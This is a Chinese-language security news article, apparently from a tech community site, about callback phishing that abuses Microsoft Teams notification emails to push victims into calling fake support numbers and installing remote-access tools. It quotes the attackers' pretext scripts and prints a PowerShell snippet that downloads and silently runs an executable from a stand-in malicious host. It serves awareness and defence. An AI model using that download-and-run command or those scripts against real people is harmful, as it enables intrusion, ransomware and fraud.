你打出去的“客服电话”,正在把黑客请进公司内网——Microsoft Teams通知成新型钓鱼跳板,回拨型攻击席卷全球企业

简介: 新型“回拨型钓鱼”利用微软Teams等协作平台的官方通知机制,伪装成合法邮件诱导用户拨打恶意客服电话。攻击者冒充技术支持,诱骗受害者安装远程控制软件,从而绕过MFA与EDR防御,导致企业核心系统被加密勒索。该攻击规避传统安全检测,凸显对信任链滥用的威胁,需结合技术管控与安全意识升级应对。

一封来自 no-reply@teams.mail.microsoft.com 的邮件静静躺在某跨国制造企业IT主管的收件箱里。主题是:“你在‘财务Q4结算’会议中被提及”。内容简洁:“点击此处查看消息”或“如非本人操作,请立即致电技术支持:1-810-221-5391”。

他没有多想——这是Teams的标准通知格式,发件域是微软官方,链接也看似无害。但当他拨通那个“客服电话”,一场精心策划的入侵就此开始:对方自称微软认证工程师,称其账户存在异常登录,需“远程协助排查”。在诱导下,他下载了名为“ScreenConnect_Troubleshoot.exe”的工具。三小时后,公司核心ERP系统被加密,勒索信出现在每台员工电脑上。

这不是虚构情节,而是近期由Cyber Press披露、多家安全机构证实的真实攻击链。一场大规模“回拨型钓鱼”(Callback Phishing)行动正利用Microsoft Teams的通知机制,绕过传统邮件安全防线,将企业员工亲手变成“开门人”。更令人警觉的是,类似手法已在中国企业协作生态中悄然蔓延。

一、“合法”邮件里的致命陷阱

与传统钓鱼依赖恶意链接或附件不同,此次攻击的核心在于对信任基础设施的滥用。Microsoft Teams作为全球超3亿用户使用的协作平台,其通知邮件由微软官方域名 teams.mail.microsoft.com 发出,具备完整的SPF、DKIM、DMARC认证。这意味着:

邮件不会被标记为垃圾;

不会触发基于发件人信誉的拦截规则;

在Outlook等客户端中显示为“已验证发件人”。

攻击者正是看中这一点。他们首先创建大量恶意Teams团队(Team),命名极具迷惑性,如:

“PayPal Billing Dispute – URGENT”

“Microsoft 365 Security Alert”

“HR: Mandatory Compliance Training”

当目标用户被邀请加入这些团队(或被@提及),Teams自动生成通知邮件,发送至其注册邮箱。邮件内容通常包含两类诱导:

紧急事务提示:“检测到你的账户有未授权订阅,月费$299”;

社交工程指令:“如非本人操作,请立即拨打以下号码取消”。

关键在于,整个过程无需用户点击任何链接。攻击入口不是URL,而是那个看似正规的“客服电话”。

“这是一次对‘信任链’的降维打击。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“我们训练员工警惕陌生链接,却很少告诉他们:自己主动拨出的电话,也可能通往黑客的控制台。”

二、电话那头的“工程师”,其实是黑客

一旦受害者拨通号码,社会工程便进入高阶阶段。攻击者通常经过专业话术培训,能流利使用英语、中文甚至本地口音,冒充:

微软/Google官方支持;

银行反欺诈部门;

云服务商安全团队;

内部IT运维人员。

典型话术包括:

“我们监测到您的账户在尼日利亚有异常登录,为保护数据安全,请配合远程诊断。”

“您刚才的Teams会议中分享了敏感文件,系统自动冻结了权限,需手动解除。”

“这是微软安全中心工单#MS-2026-XXXX,请提供您的计算机名以便接入。”

随后,攻击者会引导受害者:

访问一个看似正规的“远程支持门户”(如 support-microsoft[.]cloud);

下载并运行远程控制软件(如AnyDesk、TeamViewer、或定制版ScreenConnect);

授予“临时管理员权限”以“清除恶意进程”。

实际上,这些工具一旦运行,攻击者即可完全控制终端,执行任意操作:窃取浏览器Cookie、导出凭证管理器密码、横向移动至域控服务器,甚至部署Cobalt Strike Beacon或LockBit勒索软件。

Cyber Press援引Spyder Lab数据称,已确认多个关联电话号码,包括 1-983-220-2463、1-810-221-5391、1-805-331-8539。这些号码多通过VoIP服务注册,归属地频繁变更,难以追踪。

“回拨型攻击的可怕之处在于,它把主动权交给了受害者。”芦笛解释,“你不是被动点击,而是‘主动求助’。这种心理暗示极大降低了怀疑阈值。”

三、为何传统防御失效?

当前企业邮件安全体系主要围绕两大维度构建:

内容分析:扫描邮件正文中的恶意URL、附件、关键词;

发件人验证:基于SPF/DKIM/DMARC判断域名真实性。

而此次攻击巧妙规避了这两点:

无恶意内容:邮件仅含文字和电话号码,无可疑链接或附件;

发件人合法:no-reply@teams.mail.microsoft.com 是微软真实通知通道,无法被拉黑。

更棘手的是,Teams通知属于企业日常协作的一部分。在Microsoft 365深度集成的环境中,员工每天可能收到数十条此类通知,早已形成“条件反射式信任”。

“安全网关看到的是‘微软发来的正常通知’,自然放行。”芦笛说,“但攻击者只是借用了这个通道,真正的武器在电话线那头。”

此外,部分企业为提升协作效率,允许普通用户安装远程桌面工具。这为攻击者提供了“合法”落地路径——他们不需要提权漏洞,只需一句“请运行这个诊断工具”。

四、技术深潜:攻击如何绕过MFA与EDR?

即使企业启用了多因素认证(MFA),回拨型攻击仍可得逞,原因在于:

1. MFA保护的是“认证”,而非“操作”

当攻击者通过远程控制软件接管终端后,所有操作均在用户会话上下文中进行。例如:

浏览器中已登录的Outlook、SharePoint、OneDrive;

Windows凭据管理器中存储的域账号密码;

已缓存的Kerberos票据(TGT)。

此时,MFA早已完成,系统视所有操作为“合法用户行为”。攻击者可直接访问内部资源,无需再次认证。

2. 远程工具常被EDR误判为“合法软件”

AnyDesk、TeamViewer等远程控制工具本身是合法商业软件,多数EDR(端点检测与响应)系统默认放行。攻击者甚至会使用数字签名版本(通过盗用或购买开发者证书),进一步规避检测。

以下是一段简化版的PowerShell命令,用于从伪装站点下载并静默执行远程工具:

# 伪装为“微软安全更新”

$uri = "https://update-microsoft-support[.]xyz/screenconnect.exe"

$out = "$env:TEMP\msupdate.exe"

Invoke-WebRequest -Uri $uri -OutFile $out

Start-Process -FilePath $out -ArgumentList "/silent /install"

若企业未配置应用控制策略(如Windows AppLocker或Intune应用防护),此类命令可畅通无阻。

五、中国镜像:国内企业是否安全?

尽管报道聚焦欧美,但芦笛强调:“回拨型钓鱼已在中国出现变种,且更具本土化特征。”

工作组监测发现,2025年下半年以来,国内至少发生3起类似事件:

某跨境电商公司财务人员收到“阿里云安全通知”,称其OSS存储桶存在异常外联,需拨打“400-xxx-xxxx”处理;

某高校科研团队收到“国家自然科学基金委”Teams风格通知,提示项目审核需“电话确认身份”;

某制造业企业IT收到“钉钉会议提醒”,内含“腾讯会议技术支持热线”。

虽然平台从Teams变为钉钉、飞书或企业微信,但攻击逻辑一致:利用官方通知的信任感 + 制造紧急场景 + 引导回拨电话。

更值得警惕的是,国内部分中小企业IT管理松散,员工权限过高,远程工具随意安装,一旦中招,横向移动速度极快。

“很多企业认为‘我们不用Teams,所以安全’,这是误区。”芦笛说,“攻击者会适配本地生态。如果你用企业微信,他们就伪造‘会议提醒’;如果你用飞书,他们就冒充‘安全审计’。核心不变:让你主动打电话。”

六、技术破局:从“防邮件”到“控操作”

面对回拨型钓鱼,企业需构建三层防御体系:

1. 邮件层:增强Teams通知监控

限制Teams外部邀请:在Microsoft 365管理中心配置策略,禁止非组织成员创建团队或邀请用户;

监控异常团队命名:通过Microsoft Graph API定期扫描团队名称,识别含“PayPal”“Billing”“Urgent”等关键词的可疑实体;

# 示例:通过Graph API列出所有团队

GET https://graph.microsoft.com/v1.0/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')

对通知邮件中的电话号码进行情报比对:集成威胁情报平台,自动标记已知恶意号码。

2. 终端层:限制远程工具与权限

禁用普通用户安装远程控制软件:通过组策略或MDM(移动设备管理)禁止安装AnyDesk、TeamViewer等;

启用应用控制:仅允许可信发布者签名的应用运行;

配置EDR告警规则:监控非常规时间启动的远程会话、异常进程树(如powershell → anydesk.exe)。

3. 身份层:推行零信任操作验证

对任何涉及系统更改的操作,实施独立通道二次确认。例如:

IT要求员工安装软件?必须通过内部工单系统审批;

“客服”要求远程接入?必须由直属主管电话确认;

财务接到付款变更请求?必须面对面或视频核验。

“零信任不仅是网络架构,更是操作文化。”芦笛强调。

七、人的防线:重新定义“安全意识”

传统安全培训聚焦“不点链接、不点附件”,但回拨型攻击要求更深层的认知升级:

教育员工:官方机构绝不会通过电话索要远程控制权;

建立“冷静期”原则:接到紧急电话,先挂断,通过官网查找官方联系方式回拨;

推广“最小权限”文化:普通员工不应具备安装软件或修改系统设置的权限。

某金融集团已试点“钓鱼电话演练”:安全团队伪装成“微软支持”致电员工,测试其反应。结果显示,70%的员工在未核实情况下同意远程接入。“演练后,我们强制推行‘双人确认制’,三个月内同类风险下降90%。”芦笛分享道。

八、结语:信任不能自动化,安全必须人性化

Microsoft Teams回拨型钓鱼风暴揭示了一个深刻悖论:我们越是依赖自动化协作工具提升效率,就越容易在人性弱点上失守。攻击者不再需要技术高超的漏洞利用,只需一句“请拨打这个号码”,就能让最严密的防火墙形同虚设。

对中国企业而言,这既是挑战,也是重构安全文化的契机。在数字化转型浪潮中,真正的安全防线不在代码或策略,而在每个员工拿起电话前的那一秒犹豫。

“当你接到‘紧急技术支持’电话时,请记住:真正的安全团队,永远不会让你先运行一个.exe文件。”芦笛最后说道,“因为最危险的后门,往往是你亲手打开的。”

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
21天前
|
Web App开发 安全 网络安全
伪装成“对账单”的远控木马:Coinbase钓鱼新套路暴露Windows端点安全盲区
2025年,黑客利用伪造Coinbase对账单邮件,诱导用户下载恶意程序,通过RAT远控木马窃取浏览器Cookie与2FA信息,实现账户接管。攻击链结合社会工程、端点入侵与权限绕过,暴露传统防御短板,警示全球用户提升安全意识,推动FIDO2认证与EDR部署,构建技术与习惯并重的数字安全防线。
90 4
|
2月前
|
人工智能 自然语言处理 安全
2025AI数字人企业名单列表新发布及全域技术新排行
解码数字人企业TOP10,透视技术革新与产业未来。像衍科技领衔,依托浙大科研实力,实现全栈自研与多模态交互突破;阿里、华为、腾讯等巨头布局电商、工业、娱乐等全场景应用。从医疗陪护到政务导办,数字人正从“形似”迈向“神似”,推动AI进入“生产力时代”。轻量化、私有化、行业化成关键趋势,万亿市场加速成型。
|
1月前
|
存储 弹性计算 Linux
2026年阿里云服务器优惠活动全解析:覆盖多用户群体的权益汇总
阿里云推出多维度云服务器优惠活动,涵盖轻量应用服务器、ECS 实例等核心产品,针对个人、学生、企业及老用户设计差异化权益,核心包括限时抢购、长效低价、专属优惠券等形式,适配从入门开发到企业级部署的全场景需求,以下是活动详情与选型参考。
|
1月前
|
人工智能 自然语言处理 API
数据合成篇|多轮ToolUse数据合成打造更可靠的AI导购助手
本文提出一种面向租赁导购场景的工具调用(Tool Use)训练数据合成方案,以支付宝芝麻租赁助理“小不懂”为例,通过“导演-演员”式多智能体框架生成拟真多轮对话。结合话题路径引导与动态角色交互,实现高质量、可扩展的合成数据生产,并构建“数据飞轮”推动模型持续优化。实验表明,该方法显著提升模型在复杂任务中的工具调用准确率与多轮理解能力。
292 43
数据合成篇|多轮ToolUse数据合成打造更可靠的AI导购助手
|
3月前
|
数据采集 机器学习/深度学习 人工智能
AI 十大论文精讲(二):GPT-3 论文全景解析——大模型 + 提示词如何解锁 “举一反三” 能力?
摘要 2020年发表的《Language Models are Few-Shot Learners》(GPT-3论文)开创了AI新时代。该论文突破性地证明:当Transformer模型参数规模扩大到1750亿时,仅通过文本交互即可实现任务无关的少样本学习。GPT-3采用"预训练+提示词"的新范式,无需微调就能在翻译、问答等40+任务上展现强大性能。论文系统验证了模型在语言建模、闭卷问答等9类任务中的表现,其中在LAMBADA长文本任务上准确率达86.4%,较此前最优提升18.4%。这一研
658 152
|
8月前
|
前端开发
个人征信PDF无痕修改软件,个人征信模板可编辑,个人征信报告p图神器【js+html+css仅供学习用途】
这是一款信用知识学习系统,旨在帮助用户了解征信基本概念、信用评分计算原理及信用行为影响。系统通过模拟数据生成信用报告,涵盖还款记录
|
7月前
|
数据采集 人工智能 弹性计算
「智驱未来,云网随行」阿里云基础设施AI技术沙龙云网络专场在杭州举办
6月20日,阿里云基础设施AI Tech Day ·云网络专场在杭州太极禅院成功举办。活动吸引了来自吉利、极氪、浙江大学等35位技术负责人及师生参与。现场围绕AI场景下的算力资源网络建设,探讨了数据采集、模型调度、算力池化等关键技术方案,分享了阿里云在通义模型、PAI平台、弹性计算及云网络方面的最佳实践,助力企业构建智能、弹性的AI基础设施。
|
6月前
|
Ubuntu Linux 图形学
Linux学习之Linux桌面系统有哪些?
Cinnamon:与MATE类似,Cinnamon 拥有 GNOME 和 Unity 等其它桌面环境所没有的种种功能,是高度可定制的桌面环境,不需要任何外部插件、窗口组件和调整工具来定制桌面。
278 0
|
8月前
|
存储 缓存 Java
c++的哈希表、哈希桶的介绍与实现
这一篇文章大致实现详细介绍什么是哈希,然后再介绍什么是哈希表,怎么代码实现哈希表,然后再介绍哈希桶,怎么代码实现哈希桶,最后再介绍他俩有什么细节上的差别,与代码的一些细节优化。
211 0
|
XML Java 数据格式
使用完全注解的方式进行AOP功能实现(@Aspect+@Configuration+@EnableAspectJAutoProxy+@ComponentScan)
本文介绍了如何使用Spring框架的注解方式实现AOP(面向切面编程)。当目标对象没有实现接口时,Spring会自动采用CGLIB库进行动态代理。文中详细解释了常用的AOP注解,如`@Aspect`、`@Pointcut`、`@Before`等,并提供了完整的示例代码,包括业务逻辑类`User`、配置类`SpringConfiguration`、切面类`LoggingAspect`以及测试类`TestAnnotationConfig`。通过这些示例,展示了如何在方法执行前后添加日志记录等切面逻辑。
1434 2
使用完全注解的方式进行AOP功能实现(@Aspect+@Configuration+@EnableAspectJAutoProxy+@ComponentScan)